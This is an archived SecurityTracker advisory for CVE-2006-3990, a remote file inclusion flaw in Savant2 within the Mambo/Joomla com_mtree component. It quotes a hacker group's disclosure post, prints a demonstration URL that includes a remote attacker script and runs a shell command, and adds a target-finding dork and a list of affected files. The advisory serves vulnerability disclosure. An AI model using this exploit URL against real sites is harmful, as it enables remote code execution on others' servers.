SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Savant2 Vendors:   phpsavant.com
Savant2 Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016560
SecurityTracker URL:  http://securitytracker.com/id/1016560
CVE Reference:   CVE-2006-3990   (Links to External Site)
Updated:  Jun 13 2008
Original Entry Date:  Jul 24 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Savant2. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'mosConfig_absolute_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id

Several other scripts are also affected, including:

Savant2_Compiler_basic.php
Savant2_Error_pear.php
Savant2_Error_stack.php
Savant2_Filter_colorizeCode.php
Savant2_Filter_trimwhitespace.php
Savant2_Plugin_ahref.php
Savant2_Plugin_ahrefcontact.php
Savant2_Plugin_ahreflisting.php
Savant2_Plugin_ahreflistingimage.php
Savant2_Plugin_ahrefmap.php
Savant2_Plugin_ahrefownerlisting.php
Savant2_Plugin_ahrefprint.php
Savant2_Plugin_ahrefrating.php
Savant2_Plugin_ahrefrecommend.php
Savant2_Plugin_ahrefreport.php
Savant2_Plugin_ahrefreview.php
Savant2_Plugin_ahrefvisit.php
Savant2_Plugin_checkbox.php
Savant2_Plugin_cycle.php
Savant2_Plugin_dateformat.php
Savant2_Plugin_editor.php
Savant2_Plugin_form.php
Savant2_Plugin_image.php
Savant2_Plugin_input.php
Savant2_Plugin_javascript.php
Savant2_Plugin_listalpha.php
Savant2_Plugin_listingname.php
Savant2_Plugin_modify.php
Savant2_Plugin_mtpath.php
Savant2_Plugin_options.php
Savant2_Plugin_radios.php
Savant2_Plugin_rating.php
Savant2_Plugin_stylesheet.php
Savant2_Plugin_textarea.php

botan reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpsavant.com/yawiki/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Kurdish Security # 13] Savant2 Remote File Include Vulnerability

>>> Kurdish Security 

>>> Savant2 Remote File Include Vulnerability 

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhac % www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote 

>>> Script : Savant2

>>> Site : www.phpsavant.com

>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends

d0rkiz : "com_mtree"
----------------------------------------------------------------------------------


/** 
* Base plugin class. 
*/ 
global $mosConfig_absolute_path; 
require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php'; 

/**

For mambo and joomla


http://www.site.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id

used link :]

Savant2_Compiler_basic.php 
Savant2_Error_pear.php 
Savant2_Error_stack.php 
Savant2_Filter_colorizeCode.php 
Savant2_Filter_trimwhitespace.php 
Savant2_Plugin_ahref.php 
Savant2_Plugin_ahrefcontact.php 
Savant2_Plugin_ahreflisting.php 
Savant2_Plugin_ahreflistingimage.php 
Savant2_Plugin_ahrefmap.php 
Savant2_Plugin_ahrefownerlisting.php 
Savant2_Plugin_ahrefprint.php 
Savant2_Plugin_ahrefrating.php 
Savant2_Plugin_ahrefrecommend.php 
Savant2_Plugin_ahrefreport.php 
Savant2_Plugin_ahrefreview.php 
Savant2_Plugin_ahrefvisit.php 
Savant2_Plugin_checkbox.php 
Savant2_Plugin_cycle.php 
Savant2_Plugin_dateformat.php 
Savant2_Plugin_editor.php 
Savant2_Plugin_form.php 
Savant2_Plugin_image.php 
Savant2_Plugin_input.php 
Savant2_Plugin_javascript.php 
Savant2_Plugin_listalpha.php 
Savant2_Plugin_listingname.php 
Savant2_Plugin_modify.php 
Savant2_Plugin_mtpath.php 
Savant2_Plugin_options.php 
Savant2_Plugin_radios.php 
Savant2_Plugin_rating.php 
Savant2_Plugin_stylesheet.php 
Savant2_Plugin_textarea.php

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC